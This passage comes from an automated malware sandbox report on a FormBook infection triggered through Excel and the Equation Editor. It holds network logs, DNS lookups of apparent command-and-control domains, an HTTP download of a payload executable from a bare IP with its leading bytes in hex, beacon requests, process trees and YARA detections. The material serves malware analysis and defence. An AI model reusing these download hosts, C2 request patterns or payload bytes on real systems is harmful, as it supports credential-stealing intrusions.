                                                                                                                                                  Jul 22, 2021 17:11:03.177740097 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177762032 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177767992 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177788019 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177798033 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177804947 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177824020 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177834034 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177841902 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177860975 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177874088 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177880049 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177896976 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177910089 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177928925 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177937984 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177946091 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177959919 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177966118 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177973032 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177990913 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177999973 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.178008080 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.178021908 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.178034067 CEST4916780192.168.2.22103.155.80.130

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 22, 2021 17:12:26.765960932 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:12:26.827300072 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:37.045444965 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:12:37.119473934 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:42.149930000 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:12:42.290482044 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:12:47.553082943 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:12:47.622333050 CEST53612008.8.8.8192.168.2.22

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Jul 22, 2021 17:12:26.765960932 CEST192.168.2.228.8.8.80xccffStandard query (0)www.thinking-diversity.comA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:37.045444965 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.compareionizers.comA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:42.149930000 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.globaltradeview.comA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:47.553082943 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.legifo.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Jul 22, 2021 17:12:26.827300072 CEST8.8.8.8192.168.2.220xccffNo error (0)www.thinking-diversity.comthinking-diversity.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:26.827300072 CEST8.8.8.8192.168.2.220xccffNo error (0)thinking-diversity.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:37.119473934 CEST8.8.8.8192.168.2.220x2e78Server failure (2)www.compareionizers.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:42.290482044 CEST8.8.8.8192.168.2.220x2f03No error (0)www.globaltradeview.com199.59.242.153A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:12:47.622333050 CEST8.8.8.8192.168.2.220x3c4eNo error (0)www.legifo.com52.58.78.16A (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 103.155.80.130
                                                                                                                                                  • www.thinking-diversity.com
                                                                                                                                                  • www.globaltradeview.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.2249167103.155.80.13080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:11:01.858670950 CEST0OUTGET /kung/bin.exe HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: 103.155.80.130
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jul 22, 2021 17:11:02.188283920 CEST1INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:11:11 GMT
                                                                                                                                                  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
                                                                                                                                                  Last-Modified: Wed, 21 Jul 2021 22:09:30 GMT
                                                                                                                                                  ETag: "b0200-5c7a96cb69dfd"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 721408
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 97 f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 f6 0a 00 00 0a 00 00 00 00 00 00 8e 14 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 14 0b 00 4f 00 00 00 00 20 0b 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 f4 0a 00 00 20 00 00 00 f6 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 06 00 00 00 20 0b 00 00 08 00 00 00 f8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 58 ed 09 00 e4 26 01 00 03 00 00 00 e0 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 4f 11 7a bb aa 11 a4 54 af 14 0e 18 4e 1f b2 7e 2f e0 d0 10 2d e5 ba c2 08 75 c0 0a 4a 46 84 79 3f ae ef 45 5c d5 21 7f 3c f3 5f 91 c7 cb 7c 12 64 49 a9 c0 36 fc 99 f9 13 da 5c 84 10 3c a7 e6 19 6a fb 99 18 14 cc 0d 06 39 d0 cd d3 a7 8d 23 60 04 c4 87 55 cd 45 8f 04 06 13 83 62 f5 c3 bd 16 98 84 e2 ca c1 75 a7 90 70 a0 88 07 46 89 2b d3 ea 6c 71 cd f2 29 84 45 3d 6d 15 9e c0 c6 32 ce 18 e9 6d 8f 27 b8 38 2f 1a 64 6b b2 9f af c4 ac ea 15 f7 59 d1 4a 15 66 98 cc 6c 90 9b b9 68 d6 4e c0 76 b3 39 42 b6 2a da b8 a5 e2 99 f5 8e 8d 80 92 86 35 25 ee 6b 4f 55 41 4b a5 02 fb 0a 84 1d 8d 5e 0b ee e4 63 30 56 07 11 9a 30 85 44 e5 e8 1f f2 b5 d7 97 9a 83 b4 f4 99 e7 f5 1e 9b f2 f9 18 03 8a 1e e9 0e d1 53 e8 b8 c4 e6 1d 90 a1 f4 94 6b 31 ce 15 63 5f be 27 54 91 c9 7a 69 3a 8c ca fe 15 cd 42 ff 17 72 ff 2a 76 96 63 a1 4e 14 72 11 50 e4 fd 6f fe 17 f5 7b 8a ac c5 12 28 0b b2 f9 4d ee 33 c1 05 30 7c e2 6b 1f 7d 34 e3 eb 4b 69 ef c4 23 1e 79 d3 2b 54 31 55 89 11 7e 8a 0d 94 13 06 0a 2f cc 81 9b ca 8a 2e 8c fe 7b 91 de 5a 11 ec 21 6c 27 d0 3e e7 84 45 9d 45 7a 4c c0 80 51 aa 3d 37 e2 a1 c6 db 8c a7 58 94 50 ee 8f 71 66 74 81 00 af 08 d5 31 d9 25 3e dc 07 f6 8b 5e f3 05 5b 63 28 0b 10 f5 e4 0a 29 01 1f 73 9a 30 8f 18 c8 e3 b4 96 64 05 8f aa 19
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5`P @ `@<O X@ H.text `.rsrcX @@.reloc@@BpHX&OzTN~/-uJFy?E\!<_|dI6\<j9#`UEbupF+lq)E=m2m'8/dkYJflhNv9B*5%kOUAK^c0V0DSk1c_'Tzi:Br*vcNrPo{(M30|k}4Ki#y+T1U~/.{Z!l'>EEzLQ=7XPqft1%>^[c()s0d


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:12:26.881021023 CEST761OUTGET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1
                                                                                                                                                  Host: www.thinking-diversity.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Jul 22, 2021 17:12:27.021441936 CEST762INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:12:26 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 275
                                                                                                                                                  ETag: "60ef677e-113"
                                                                                                                                                  Via: 1.1 google
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.2249169199.59.242.15380C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:12:42.417220116 CEST763OUTGET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1
                                                                                                                                                  Host: www.globaltradeview.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Jul 22, 2021 17:12:42.543577909 CEST764INHTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:12:42 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MbNuOLmRpArocewFjtxe7j2nPv6GrPLtnlRMXMGv4/ASgKgZyMsXkP3Kus6pnSH9t0pY8PHRr9ik6JxP5yOyvQ==
                                                                                                                                                  Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 62 4e 75 4f 4c 6d 52 70 41 72 6f 63 65 77 46 6a 74 78 65 37 6a 32 6e 50 76 36 47 72 50 4c 74 6e 6c 52 4d 58 4d 47 76 34 2f 41 53 67 4b 67 5a 79 4d 73 58 6b 50 33 4b 75 73 36 70 6e 53 48 39 74 30 70 59 38 50 48 52 72 39 69 6b 36 4a 78 50 35 79 4f 79 76 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                                                                                  Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MbNuOLmRpArocewFjtxe7j2nPv6GrPLtnlRMXMGv4/ASgKgZyMsXkP3Kus6pnSH9t0pY8PHRr9ik6JxP5yOyvQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 2752 Parent PID: 584

                                                                                                                                                  General

                                                                                                                                                  Start time:17:10:48
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x13f620000
                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: EQNEDT32.EXE PID: 2368 Parent PID: 584

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:09
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:543304 bytes
                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: vbc.exe PID: 2592 Parent PID: 2368

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:14
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x840000
                                                                                                                                                  File size:721408 bytes
                                                                                                                                                  MD5 hash:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 32%, ReversingLabs
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: vbc.exe PID: 856 Parent PID: 2592

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:37
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                  Imagebase:0x840000
                                                                                                                                                  File size:721408 bytes
                                                                                                                                                  MD5 hash:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: explorer.exe PID: 1388 Parent PID: 856

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:38
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                  Imagebase:0xffca0000
                                                                                                                                                  File size:3229696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: wlanext.exe PID: 1428 Parent PID: 1388

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:51
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                  Imagebase:0xbe0000
                                                                                                                                                  File size:77312 bytes
                                                                                                                                                  MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  Analysis Process: cmd.exe PID: 2544 Parent PID: 1428

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:56
                                                                                                                                                  Start date:22/07/2021
